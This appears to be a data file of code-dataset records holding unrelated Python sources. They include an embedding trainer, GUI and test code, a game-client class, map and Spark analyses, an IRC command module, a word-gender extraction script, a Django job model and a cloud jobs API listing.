load_data(data_dir):\n    with open(data_dir, 'rb') as f:\n        my_data = pickle.load(f)\n    return my_data\n\ndef count_unique(patient_record):\n    \"\"\"count unique concepts in the patient record\"\"\"\n    concept_list = []\n    for visit in patient_record:\n        concept_list.extend(visit)\n    return list(set(concept_list))\n\ndef build_dict(patient_record):\n    unique_concept = count_unique(patient_record)\n    my_dict = dict()\n\n    for i in range(len(unique_concept)):\n        my_dict[unique_concept[i]] = i\n\n    return my_dict\n\ndef parse_arguments(parser):\n    parser.add_argument(\"--input\", type=str, help=\"The path of training data\")\n    parser.add_argument(\"--output\", type=str, help=\"The path to output results\")\n    parser.add_argument(\"--dim\", type=int, default=200, help=\"The dimension of embeddings\")\n    parser.add_argument(\"--max_vocab\", type=int, default=1000, help=\"The maximum vocabulary size\")\n    parser.add_argument(\"--scaling_factor\", type=float, default=0.75, help=\"The scaling factor\")\n    parser.add_argument(\"--batch_size\", type=int, default=512000, help=\"Training batch size\")\n    parser.add_argument(\"--num_epochs\", type=int, default=50, help=\"Training epochs\")\n    parser.add_argument(\"--learning_rate\", type=float, default=0.01, help=\"Learning rate for Adagrad optimizer\")\n    args = parser.parse_args()\n    return args\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    args = parse_arguments(parser)\n\n    training_data = load_data(args.input)\n    GloVe_model = GloVe(args.output, args.dim, args.max_vocab, args.scaling_factor, args.batch_size, args.num_epochs, args.learning_rate)\n    GloVe_model.buildCoMatrix(training_data)\n    GloVe_model.initParams()\n    GloVe_model.trainModel()","sub_path":"src/GloVe.py","file_name":"GloVe.py","file_ext":"py","file_size_in_byte":7808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"464082613","text":"#===============================================================================\r\n# $Header: /Tools/Build/Build.py 2 1/17/02 9:21a Ryan $\r\n#\r\n# DESCRIPTION: This is a GUI for constructing and editing.\r\n#\r\n# ORIGINAL AUTHOR: Ryan Donahue\r\n#===============================================================================\r\nimport Tkinter, Pmw\r\nfrom Tools.Build import BuildApi\r\nfrom Tools.Build import BuildWizard\r\nfrom Tools.Build import BuildGUI\r\n\r\nTRUE = 1\r\nFALSE = 0\r\n\r\n\r\nclass Gui:\r\n\r\n    def __init__ (self, root, parent=None):\r\n        self.__firstRun = TRUE\r\n        self.root = root\r\n        if parent:\r\n            self.parent = parent\r\n        else:\r\n            self.parent = root\r\n        self.frame = Tkinter.Frame (self.parent)\r\n        self.frame.pack()\r\n\r\n        \"Create a notebook consisting of a construction page and an editing page.\"\r\n        # Create the notebook.\r\n        notebook = Pmw.NoteBook(self.parent, raisecommand=self.__LoadPage)\r\n        notebook.pack(fill = 'both', expand = 1, padx = 10, pady = 10) \r\n\r\n        # Create the perform page. 
\r\n page = notebook.add ('Perform')\r\n self.__performPage = BuildGUI.Gui (self.root, page)\r\n\r\n # Create the editing page.\r\n page = notebook.add ('Edit')\r\n self.__editPage = BuildWizard.Gui (self.root, page)\r\n \r\n notebook.setnaturalsize()\r\n self.__firstRun = FALSE\r\n \r\n\r\n def __LoadPage (self, pageName):\r\n if self.__firstRun:\r\n return\r\n if pageName == \"Perform\":\r\n self.__performPage.LoadBuilds()\r\n else:\r\n self.__editPage.LoadPage()\r\n \r\n \r\n \r\n\r\n \r\n####################################################################\r\nif __name__ == '__main__':\r\n root = Tkinter.Tk()\r\n Pmw.initialise(root, fontScheme = 'pmw1')\r\n root.title(\"Builds\")\r\n root.geometry ( \"%dx%d%+d%+d\" % (600, 500, 50, 50 ) )\r\n\r\n exitButton = Tkinter.Button(root, text = 'Exit', command = root.destroy)\r\n exitButton.pack(side = 'bottom')\r\n widget = Gui(root)\r\n root.mainloop()\r\n","sub_path":"Tools/Build/Build.pyw","file_name":"Build.pyw","file_ext":"pyw","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"166438372","text":"# -*- encoding: utf-8 -*-\nimport os\n\nimport numpy as np\nimport ParamSklearn.util as putil\n\nimport autosklearn\nfrom autosklearn.util.backend import Backend\nfrom autosklearn.constants import *\nfrom base import Base\n\n\nclass ArrayReturningDummyPredictor(object):\n def __init__(self, test):\n self.arr = test\n\n def predict_proba(self, X):\n return self.arr\n\nclass EstimatorTest(Base):\n _multiprocess_can_split_ = True\n\n def test_fit(self):\n output = os.path.join(self.test_dir, '..', '.tmp_estimator_fit')\n self._setUp(output)\n\n X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')\n automl = autosklearn.AutoSklearnClassifier(time_left_for_this_task=12,\n per_run_time_limit=12,\n tmp_folder=output,\n output_folder=output)\n automl.fit(X_train, Y_train)\n score = automl.score(X_test, Y_test)\n print(automl.show_models())\n\n self.assertGreaterEqual(score, 0.8)\n self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION)\n\n del automl\n self._tearDown(output)\n\n def test_pSMAC_wrong_arguments(self):\n self.assertRaisesRegexp(ValueError,\n \"If shared_mode == True tmp_folder must not \"\n \"be None.\",\n autosklearn.AutoSklearnClassifier,\n shared_mode=True)\n\n self.assertRaisesRegexp(ValueError,\n \"If shared_mode == True output_folder must not \"\n \"be None.\",\n autosklearn.AutoSklearnClassifier,\n shared_mode=True,\n tmp_folder='/tmp/duitaredxtvbedb')\n\n def test_fit_pSMAC(self):\n output = os.path.join(self.test_dir, '..', '.tmp_estimator_fit_pSMAC')\n self._setUp(output)\n\n X_train, Y_train, X_test, Y_test = putil.get_dataset('iris')\n\n automl = autosklearn.AutoSklearnClassifier(time_left_for_this_task=15,\n per_run_time_limit=15,\n output_folder=output,\n tmp_folder=output,\n shared_mode=True,\n seed=1,\n initial_configurations_via_metalearning=0,\n ensemble_size=0)\n automl.fit(X_train, Y_train)\n\n # Create a 'dummy model' for the first run, which has an accuracy of\n # more than 99%; it should be in the final ensemble if the ensemble\n # building of the second AutoSklearn classifier works correct\n true_targets_ensemble_path = os.path.join(output, '.auto-sklearn',\n 'true_targets_ensemble.npy')\n true_targets_ensemble = np.load(true_targets_ensemble_path)\n true_targets_ensemble[-1] = 1 if true_targets_ensemble[-1] != 1 else 0\n probas = np.zeros((len(true_targets_ensemble), 3), dtype=float)\n for i, value in 
enumerate(true_targets_ensemble):\n probas[i, value] = 1.0\n dummy_predictions_path = os.path.join(output, '.auto-sklearn',\n 'predictions_ensemble',\n 'predictions_ensemble_1_00030.npy')\n with open(dummy_predictions_path, 'wb') as fh:\n np.save(fh, probas)\n\n probas_test = np.zeros((len(Y_test), 3), dtype=float)\n for i, value in enumerate(Y_test):\n probas_test[i, value] = 1.0\n\n dummy = ArrayReturningDummyPredictor(probas_test)\n backend = Backend(output, output)\n backend.save_model(dummy, 30, 1)\n\n automl = autosklearn.AutoSklearnClassifier(time_left_for_this_task=10,\n per_run_time_limit=10,\n output_folder=output,\n tmp_folder=output,\n shared_mode=True,\n seed=2,\n initial_configurations_via_metalearning=0,\n ensemble_size=0)\n automl.fit(X_train, Y_train)\n automl.run_ensemble_builder(0, 1, 50).wait()\n\n score = automl.score(X_test, Y_test)\n\n self.assertEqual(len(os.listdir(os.path.join(output, '.auto-sklearn',\n 'ensemble_indices'))), 1)\n self.assertGreaterEqual(score, 0.95)\n self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION)\n\n del automl\n self._tearDown(output)\n\n","sub_path":"test/automl/test_estimators.py","file_name":"test_estimators.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"207661374","text":"#Embedded file name: eve/client/script/environment/spaceObject\\spewContainer.py\n\"\"\"\nSpaceObject code for Spew Container\n\"\"\"\nimport blue\nimport geo2\nimport audio2\nfrom eve.client.script.environment.spaceObject.spaceObject import SpaceObject\nimport evegraphics.settings as gfxsettings\nimport hackingcommon.hackingConstants as hackingConst\n\nclass SpewContainer(SpaceObject):\n \"\"\"\n This class wraps client balls that are spew containers\n \"\"\"\n\n def __init__(self):\n super(SpewContainer, self).__init__()\n self.explodeOnRemove = True\n\n def Assemble(self):\n self.UnSync()\n if self.model is not None:\n self.model.ChainAnimationEx('NormalLoop', 0, 0, 1.0)\n self.spewFX = self.LoadFX()\n slimItem = self.typeData.get('slimItem')\n if slimItem.hackingSecurityState is not None:\n state = slimItem.hackingSecurityState\n else:\n state = hackingConst.hackingStateSecure\n self.SetSecurityState(state)\n self.SetupSharedAmbientAudio()\n self.SetStaticRotation()\n\n def SetSecurityState(self, securityState):\n \"\"\"\n Sets the security state on this container and applies animations accordingly.\n \"\"\"\n if securityState == hackingConst.hackingStateBeingHacked:\n self.TriggerAnimation('hacking')\n elif securityState == hackingConst.hackingStateHacked:\n self.TriggerAnimation('empty')\n elif securityState == hackingConst.hackingStateSecure:\n self.TriggerAnimation('idle')\n\n def PlaySpewEffect(self, spewCone):\n if self.model:\n self.ClearFX(self.model, self.spewFX)\n self.PlayFX(self.model, self.spewFX, spewCone)\n self.PlaySoundFX(self.model, spewCone)\n else:\n self.LogError('PlaySpewEffect failed - no model exists for the space object!')\n\n def PlaySoundFX(self, targetObject, spewCone):\n position, direction = spewCone\n audioEmitter = audio2.AudEmitter(targetObject.name + '_src')\n translatedPosition = geo2.Vec3Add(targetObject.worldPosition, position)\n audioEmitter.SetPosition(direction, translatedPosition)\n audioEmitter.SetAttenuationScalingFactor(10000)\n audioEmitter.SendEvent('scattering_spew_play')\n\n def LoadFX(self):\n \"\"\"\n Loads and returns the graphics effect for spewing\n \"\"\"\n spewGraphicsID = 20306\n graphicEntry = 
cfg.graphics.Get(spewGraphicsID)\n fx = blue.resMan.LoadObject(graphicEntry.graphicFile)\n return fx\n\n def ClearFX(self, targetObject, fx):\n \"\"\"\n Removes any existing spew effect from the target object\n \"\"\"\n for obj in list(targetObject.children):\n if obj.name == fx.name:\n targetObject.children.remove(obj)\n\n def PlayFX(self, targetObject, fx, spewCone):\n \"\"\"\n Playes the spew effect on the target object, using the information supplied in the spewCone\n \"\"\"\n position, direction = spewCone\n targetObject.children.append(fx)\n fx.scaling = (2000.0, 3000.0, 2000.0)\n rotation = geo2.QuaternionRotationArc((0.0, 1.0, 0.0), direction)\n fx.translation = position\n fx.rotation = rotation\n for curveSet in fx.curveSets:\n curveSet.scale = 0.15\n curveSet.PlayFrom(0.2)\n\n def Explode(self):\n if not gfxsettings.Get(gfxsettings.UI_EXPLOSION_EFFECTS_ENABLED):\n return False\n explosionURL, (delay, scaling) = self.GetExplosionInfo()\n return SpaceObject.Explode(self, explosionURL=explosionURL, managed=True, delay=delay, scaling=scaling)\n","sub_path":"eve/client/script/environment/spaceObject/spewContainer.py","file_name":"spewContainer.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"424164443","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRead data for optimization\n\"\"\"\nimport pandas as pd\nfrom datetime import date\nimport folium\n \ndef read_and_process_data(trend_data, region_data, today = date(2020,4,3)):\n \n # Read forecast\n fc_df = pd.read_csv(trend_data,sep=\",\")\n fc_df.iva_corrected.fillna(fc_df.predicted, inplace=True)\n fc_df = fc_df.rename(columns={\"date\": \"Date\", \"iva_corrected\": \"IVA\"})\n fc_df.Region = fc_df.Region.apply(lambda x: x.replace(\"Region \", \"\"))\n fc_df = fc_df.replace(\"Örebro län\", \"Örebro\")\n fc_df = fc_df.replace(\"Jönköpings län\", \"Jönköping\")\n fc_df = fc_df.replace(\"Kalmar län\", \"Kalmar\")\n\n # Read region data\n region_df = pd.read_csv(region_data,sep=\";\")\n region_df.Region = region_df.Region.apply(lambda x: x.replace(\"Region \", \"\"))\n\n # Extract current still image\n current_df = fc_df[fc_df[\"Date\"] == today.strftime(\"%Y-%m-%d\")]\n\n # Merge current_df with region data\n current_df = current_df.merge(region_df, on=['Region'], how='left')\n\n # Process current_df\n current_df[\"UnderCapacity\"] = current_df[\"IVA\"] - current_df[\"Capacity\"]\n current_df[\"UnderCapacity\"] = current_df[\"UnderCapacity\"].apply(lambda x: max(0,x))\n current_df[\"SurplusCapacity\"] = current_df[\"Capacity\"] - current_df[\"IVA\"]\n current_df[\"SurplusCapacity\"] = current_df[\"SurplusCapacity\"].apply(lambda x: max(0,x))\n current_df[\"Rate\"] = current_df[\"IVA\"] / current_df[\"Capacity\"]\n current_df = current_df.set_index(current_df.Region)\n\n # Region data\n trend_dict = {}\n for d in list(region_df.Region):\n data = fc_df[fc_df.Region==d]\n data = data.groupby('Date').sum().reset_index()\n data['Date']=pd.to_datetime(data['Date'])\n data = data.sort_values(by=['Date'], ascending=False)\n trend_dict[d] = data\n \n return current_df, trend_dict\n\ndef plot_initial_state(current_df,geojson):\n \n # Initiate map\n m = folium.Map(location=[62, 20], zoom_start=5)\n \n # Define styling rules for counties\n def style_function(feature):\n d = feature['properties']['name'] \n \n if current_df.at[d,\"Rate\"] < 0.5:\n if current_df.at[d,\"SurplusCapacity\"] > 3:\n color = '#7AA826' #green\n else: \n color = '#FFCA2D' #yellow\n 
elif 0.5 <= current_df.at[d,\"Rate\"] < 0.9:\n color='#FFCA2D' #yellow\n elif 0.9 <= current_df.at[d,\"Rate\"] <= 1:\n color='#EA830E' #orange \n elif 1 < current_df.at[d,\"Rate\"]:\n color='#BF2C2A' #red\n \n return {'fillOpacity': 0.4,'weight': 0.5,\n 'color': 'black','fillColor': color}\n \n # Import geojson data and apply styling rule\n folium.GeoJson(\n geojson,\n name='geojson',\n style_function=style_function\n ).add_to(m)\n \n # Add a clickable circle to each county\n for idx, row in current_df.iterrows(): \n \n # Define styling rules\n if row.Rate < 0.5:\n if row.SurplusCapacity > 3:\n color = '#7AA826' #green\n else: \n color = '#FFCA2D' #yellow\n elif 0.5 <= row.Rate < 0.9:\n color='#FFCA2D' #yellow\n elif 0.9 <= row.Rate <= 1:\n color='#EA830E' #orange\n elif 1 < row.Rate:\n color='#BF2C2A' #red\n \n # Draw circle\n folium.Circle(\n radius= 7000 + row.IVA*200,\n location=[row.Lat, row.Long],\n popup=folium.Popup('<b>'+row.Region+'</b><br>'+\\\n '<br>Patienter: '+str(row.IVA)+\\\n '<br>Kapacitet: '+str(row.Capacity),\n max_width=450,min_width=150),\n color=color,\n fill=True,\n fill_color=color,\n tooltip=\"Klicka här!\",\n ).add_to(m)\n \n from branca.element import Template, MacroElement\n\n template = \"\"\"\n {% macro html(this, kwargs) %}\n\n <!doctype html>\n <html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <title>jQuery UI Draggable - Default functionality\n \n\n \n \n\n \n \n \n\n\n
</title>\n      <link rel='stylesheet' href='https://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css'>\n      <script src='https://code.jquery.com/jquery-1.12.4.js'></script>\n      <script src='https://code.jquery.com/ui/1.12.1/jquery-ui.js'></script>\n      <script>\n      $( function() {\n        $( '#maplegend' ).draggable({\n          start: function (event, ui) {\n            $(this).css({ right: 'auto', top: 'auto', bottom: 'auto' });\n          }\n        });\n      });\n      </script>\n    </head>\n    <body>\n\n    <div id='maplegend' class='maplegend'\n         style='position: absolute; z-index: 9999; border: 2px solid grey; background-color: rgba(255, 255, 255, 0.8);\n         border-radius: 6px; padding: 10px; font-size: 14px; right: 20px; bottom: 20px;'>\n\n    <div class='legend-title' style='font-weight: bold; margin-bottom: 5px;'>Color code explanation</div>\n    <div class='legend-scale'>\n      <ul class='legend-labels' style='list-style: none; margin: 0; padding: 0;'>\n        <li><span style='display: inline-block; height: 14px; width: 28px; margin-right: 6px; background: #BF2C2A; opacity: 0.7;'></span>Over 100% of capacity</li>\n        <li><span style='display: inline-block; height: 14px; width: 28px; margin-right: 6px; background: #EA830E; opacity: 0.7;'></span>Between 90% and 100% of capacity</li>\n        <li><span style='display: inline-block; height: 14px; width: 28px; margin-right: 6px; background: #FFCA2D; opacity: 0.7;'></span>Between 50% and 90% of capacity</li>\n        <li><span style='display: inline-block; height: 14px; width: 28px; margin-right: 6px; background: #7AA826; opacity: 0.7;'></span>Less than 50% of capacity</li>\n      </ul>\n    </div>\n    </div>\n\n    </body>\n    </html>\n\n    {% endmacro %}\"\"\"\n\n    macro = MacroElement()\n    macro._template = Template(template)\n    m.get_root().add_child(macro)\n    \n    return m\n","sub_path":"src/optimization_pulp/read_data_for_optimization_pulp.py","file_name":"read_data_for_optimization_pulp.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
spark.sql(\"select h.*, b.country, b.hvacproduct from building b join hvac1 h on b.BuildingId = h.Buildingid\")\n buildingWithHvac.show()\n buildingWithHvac.registerTempTable(\"buildingWithHvacDetails\")\n countryWithTemparatureFlag= buildingWithHvac.filter(buildingWithHvac[\"tempchange\"]==\"1\")\n countrieswithTempchange=countryWithTemparatureFlag.groupBy(\"country\").count()\n countrieswithTempchangeOften=countrieswithTempchange.sort(desc(\"count\"))\n countrieswithTempchangeOften.show()\n Top2SystemAgeCountryWise=spark.sql(\"select country, SystemAge FROM \\\n ( SELECT country,SystemAge,dense_rank() OVER \\\n (PARTITION BY country ORDER BY SystemAge DESC) as rank \\\n FROM buildingWithHvacDetails ) tmp WHERE rank <= 2 \")\n Top2SystemAgeCountryWise.distinct().show()\n Lowest2SystemAgeCountryWise=spark.sql(\"select country, SystemAge FROM \\\n ( SELECT country,SystemAge,dense_rank() OVER \\\n (PARTITION BY country ORDER BY SystemAge asc) as rank \\\n FROM buildingWithHvacDetails ) tmp WHERE rank <= 2 \")\n Lowest2SystemAgeCountryWise.distinct().show()\n CountryLabel=countrieswithTempchangeOften.rdd.map(lambda x : x[\"country\"]).collect()\n Count=countrieswithTempchangeOften.rdd.map(lambda x : x[\"count\"]).collect()\n #creating a pie chart using matplot to visualize the final outcome (countries with frequent temperature changes)\n explode = (0.3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0.3)\n plt.pie(Count, labels=CountryLabel,explode=explode,autopct= lambda p : '{:.2f}% \\n({:d})'.format(p,int(round(p * sum(Count)/100))))\n plt.show()\n \nif __name__ == \"__main__\" :\n spark = SparkSession.builder.appName(\"Temperature Change across world\")\\\n .getOrCreate()\n main(spark)\n ","sub_path":"Frequent_Temperature_Changes.py","file_name":"Frequent_Temperature_Changes.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"75950554","text":"from twisted.plugin import IPlugin\nfrom twisted.words.protocols import irc\nfrom txircd.module_interface import Command, ICommand, IModuleData, ModuleData\nfrom zope.interface import implementer\nfrom typing import Any, Dict, List, Optional, Tuple\n\nirc.ERR_SERVICES = \"955\" # Custom numeric; 955 \n\n@implementer(IPlugin, IModuleData, ICommand)\nclass AccountName(ModuleData, Command):\n\tname = \"AccountName\"\n\t\n\tdef userCommands(self) -> List[Tuple[str, int, Command]]:\n\t\treturn [ (\"ACCOUNTNAME\", 1, self) ]\n\t\n\tdef parseParams(self, user: \"IRCUser\", params: List[str], prefix: str, tags: Dict[str, Optional[str]]) -> Optional[Dict[Any, Any]]:\n\t\tif not params or not params[0]:\n\t\t\tuser.sendSingleError(\"AccountNameParams\", irc.ERR_NEEDMOREPARAMS, \"ACCOUNTNAME\", \"Not enough parameters\")\n\t\t\treturn None\n\t\treturn {\n\t\t\t\"name\": params[0]\n\t\t}\n\t\n\tdef execute(self, user: \"IRCUser\", data: Dict[Any, Any]) -> bool:\n\t\tuserAccount = user.metadataValue(\"account\")\n\t\tif not userAccount:\n\t\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"NAME\", \"NOTLOGIN\")\n\t\t\tuser.sendMessage(\"NOTICE\", \"You're not logged in.\")\n\t\t\treturn True\n\t\tnameChangeResult = self.ircd.runActionUntilValue(\"accountchangename\", userAccount, data[\"name\"])\n\t\tif not nameChangeResult:\n\t\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"NAME\", \"NOACCOUNT\")\n\t\t\tuser.sendMessage(\"NOTICE\", \"This server doesn't have accounts set up.\")\n\t\t\treturn True\n\t\tif nameChangeResult[0]:\n\t\t\tuser.sendMessage(\"NOTICE\", \"Your 
account name has been updated.\")\n\t\t\treturn True\n\t\tuser.sendMessage(irc.ERR_SERVICES, \"ACCOUNT\", \"NAME\", nameChangeResult[1])\n\t\tuser.sendMessage(\"NOTICE\", \"Couldn't set your account name: {}\".format(nameChangeResult[2]))\n\t\treturn True\n\nnameChangeCommand = AccountName()","sub_path":"txircd/modules/extra/services/account_name.py","file_name":"account_name.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"173522388","text":"# %% imports\n\nfrom IPython import get_ipython\nget_ipython().run_line_magic('matplotlib', 'osx')\nimport nltk\nnltk.download('wordnet')\nfrom tqdm import tqdm\nfrom nltk.corpus import wordnet as wn\nimport yaml\nimport spacy\nimport lemminflect\nfrom multiprocessing import Pool\nimport re\n\n# %% FUNCTIONS\n\nnlp = spacy.load(\"en_core_web_sm\")\nfemale_lookup_words = [\"female\", \"woman\", \"women\", \"girl\", \"sister\", \"daughter\", \"mother\", \"mom\", \"grandmother\", \"wife\"]\nmale_lookup_words = [\"male\", \"man\", \"men\", \"boy\", \"brother\", \"son\", \"father\", \"dad\", \"grandfather\", \"husband\"]\n\n\ndef get_gender(vocab, verbose=False):\n # vocab should be a set of words that have at least one synset in wordnet\n fwords = {}\n mwords = {}\n nwords = {}\n\n for token in tqdm(vocab, total=len(vocab), desc='Getting gender from WN'):\n if len(token) == 1:\n # removing single consonant\n continue\n if any([len(re.findall(r\"\\b{}s?\\b\".format(pattern), token)) for pattern in female_lookup_words]):\n fwords[token] = wn.synsets(token)[0].definition()\n elif any([len(re.findall(r\"\\b{}s?\\b\".format(pattern), token)) for pattern in male_lookup_words]):\n mwords[token] = wn.synsets(token)[0].definition()\n else:\n definition = wn.synsets(token)[0].definition() # the first synset is supposed to be most used definition\n male_freq = sum([len(re.findall(r\"\\b{}s?\\b\".format(pattern), definition)) for pattern in male_lookup_words])\n female_freq = sum([len(re.findall(r\"\\b{}s?\\b\".format(pattern), definition)) for pattern in female_lookup_words])\n if male_freq > female_freq:\n mwords[token] = definition\n elif male_freq == female_freq:\n nwords[token] = definition\n else:\n fwords[token] = definition\n if verbose:\n print(f\"len of mwords: {len(mwords)} --- len of fwords: {len(fwords)} --- len of nwords: {len(nwords)}\")\n\n with open(\"./data/female_words.yaml\", \"w\") as ff:\n yaml.dump(fwords, ff)\n with open(\"./data/male_words.yaml\", \"w\") as ff:\n yaml.dump(mwords, ff)\n with open(\"./data/neutral_words.yaml\", \"w\") as ff:\n yaml.dump(nwords, ff)\n\n return fwords, mwords, nwords\n\n\ndef extract_words(filename, vocab, wn_vocab, mode='r'):\n assert type(vocab) is set, \"vocab argument should be set\"\n assert type(wn_vocab) is set, \"wn_vocab argument should be set\"\n\n with open(filename, mode) as f_in:\n fname = filename.split(\"/\")[-1]\n for sentence in tqdm(f_in, f\"File {fname}: \"):\n sent = nlp(sentence)\n for token in sent:\n if token.is_stop or not token.is_alpha:\n continue\n lemma = token._.lemma().lower()\n if lemma not in vocab:\n vocab.add(lemma)\n else:\n continue\n w_synsets = wn.synsets(lemma)\n if w_synsets and lemma not in wn_vocab:\n wn_vocab.add(lemma)\n return vocab, wn_vocab\n\n\n# %% main\n\nFNAME_TRAINING = '/Users/kbello/Downloads/gender_data/training/news.en-000{}{}-of-00100'\nFNAME_HELDOUT = '/Users/kbello/Downloads/gender_data/heldout/'\nFNAME_PLAIN_WORDS = 
'./data/lemmatized_words.txt'\nFNAME_NOT_FOUND = './data/not_found_words.txt'\nNCORES = 8\nresults = {}\n\n\ndef main():\n r_id = 0\n pool = Pool(NCORES)\n\n for i in tqdm(range(1, 48)):\n r_id += 1\n results[r_id] = pool.apply_async(\n extract_words,\n args=(FNAME_TRAINING.format(i//10, i%10), set(), set()),\n ) \n\n r_id += 1\n results[r_id] = pool.apply_async(\n extract_words,\n args=(FNAME_HELDOUT + 'news.en-00000-of-00100', set(), set()),\n ) \n \n for i in tqdm(range(50)):\n r_id += 1\n results[r_id] = pool.apply_async(\n extract_words,\n args=(FNAME_HELDOUT + 'news.en.heldout-000{}{}-of-00050'.format(i//10, i%10), set(), set()),\n )\n \n print(f\"total # of files analyzed: {r_id}\")\n\n pool.close()\n pool.join()\n\n vocab, wn_vocab = set(), set()\n for _, result in tqdm(results.items(), total=r_id):\n vocab_idx, wn_vocab_idx = result.get()\n vocab = vocab.union(vocab_idx)\n wn_vocab = wn_vocab.union(wn_vocab_idx)\n\n with open(\"./data/wn_vocab.yaml\", \"w\") as ff:\n yaml.dump(wn_vocab, ff)\n \n with open(\"./data/all_vocab.yaml\", \"w\") as ff:\n yaml.dump(vocab, ff)\n\n print(f\"# of words in total: {len(vocab)}\")\n print(f\"# of words in wordnet: {len(wn_vocab)}\")\n\n\n\n\n# %%\n\n\n\n# %%\n\nif __name__ == \"__main__\":\n main()","sub_path":"1Bwords_preprocess.py","file_name":"1Bwords_preprocess.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"317240539","text":"from django.contrib.postgres.fields import JSONField\nfrom django.db import models\nfrom django.utils.functional import cached_property\n\nfrom db.models.abstract_jobs import AbstractJobStatus, JobMixin\nfrom db.models.plugins import PluginJobBase\nfrom db.models.unique_names import TENSORBOARD_UNIQUE_NAME_FORMAT\nfrom libs.spec_validation import validate_tensorboard_spec_config\nfrom schemas.specifications import TensorboardSpecification\n\n\nclass TensorboardJob(PluginJobBase, JobMixin):\n \"\"\"A model that represents the configuration for tensorboard job.\"\"\"\n project = models.ForeignKey(\n 'db.Project',\n on_delete=models.CASCADE,\n related_name='tensorboard_jobs')\n config = JSONField(\n help_text='The compiled polyaxonfile for the tensorboard job.',\n validators=[validate_tensorboard_spec_config])\n experiment_group = models.ForeignKey(\n 'db.ExperimentGroup',\n on_delete=models.CASCADE,\n related_name='tensorboard_jobs',\n null=True,\n blank=True)\n experiment = models.ForeignKey(\n 'db.Experiment',\n on_delete=models.CASCADE,\n related_name='tensorboard_jobs',\n null=True,\n blank=True)\n status = models.OneToOneField(\n 'db.TensorboardJobStatus',\n related_name='+',\n blank=True,\n null=True,\n editable=True,\n on_delete=models.SET_NULL)\n\n class Meta:\n app_label = 'db'\n\n @cached_property\n def unique_name(self):\n return TENSORBOARD_UNIQUE_NAME_FORMAT.format(\n project_name=self.project.unique_name,\n id=self.id)\n\n @cached_property\n def specification(self):\n return TensorboardSpecification(values=self.config)\n\n def set_status(self, # pylint:disable=arguments-differ\n status,\n message=None,\n traceback=None,\n details=None):\n return self._set_status(status_model=TensorboardJobStatus,\n status=status,\n message=message,\n traceback=traceback,\n details=details)\n\n @cached_property\n def outputs_path(self):\n if self.experiment:\n from libs.paths.experiments import get_experiment_outputs_path\n return get_experiment_outputs_path(\n persistence_outputs=self.experiment.persistence_outputs,\n 
experiment_name=self.experiment.unique_name,\n original_name=self.experiment.original_unique_name,\n cloning_strategy=self.experiment.cloning_strategy)\n if self.experiment_group:\n from libs.paths.experiment_groups import get_experiment_group_outputs_path\n return get_experiment_group_outputs_path(\n persistence_outputs=self.experiment_group.persistence_outputs,\n experiment_group_name=self.experiment_group.unique_name)\n\n from libs.paths.projects import get_project_outputs_path\n return get_project_outputs_path(persistence_outputs=None,\n project_name=self.project.unique_name)\n\n\nclass TensorboardJobStatus(AbstractJobStatus):\n \"\"\"A model that represents tensorboard job status at certain time.\"\"\"\n job = models.ForeignKey(\n 'db.TensorboardJob',\n on_delete=models.CASCADE,\n related_name='statuses')\n\n class Meta(AbstractJobStatus.Meta):\n app_label = 'db'\n verbose_name_plural = 'Tensorboard Job Statuses'\n","sub_path":"polyaxon/db/models/tensorboards.py","file_name":"tensorboards.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"401289985","text":"#!/usr/bin/env python\n\n# Copyright 2019 Google, LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import Error\n\nclient_service = build('jobs', 'v3')\nproject_id = 'projects/' + os.environ['GOOGLE_CLOUD_PROJECT']\n\n\ndef list_everything():\n try:\n response = client_service.projects().companies().list(\n parent=project_id).execute()\n if response.get('companies') is not None:\n print('Companies and Jobs:')\n for company in response.get('companies'):\n print('%s: %s' % (company.get('displayName'),\n company.get('name')))\n jobs_response = client_service.projects().jobs().list(\n parent=project_id,\n filter='companyName=\"' + company.get('name') + '\"'\n ).execute()\n if jobs_response.get('jobs') is not None:\n for job in jobs_response.get('jobs'):\n print('- %s: %s' % (\n job.get('title'),\n job.get('name')))\n else:\n print('No companies')\n\n except Error as e:\n print('Got exception while listing everything')\n raise e\n\n\nlist_everything()\n","sub_path":"jobs-and-companies-codelab/list_everything.py","file_name":"list_everything.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 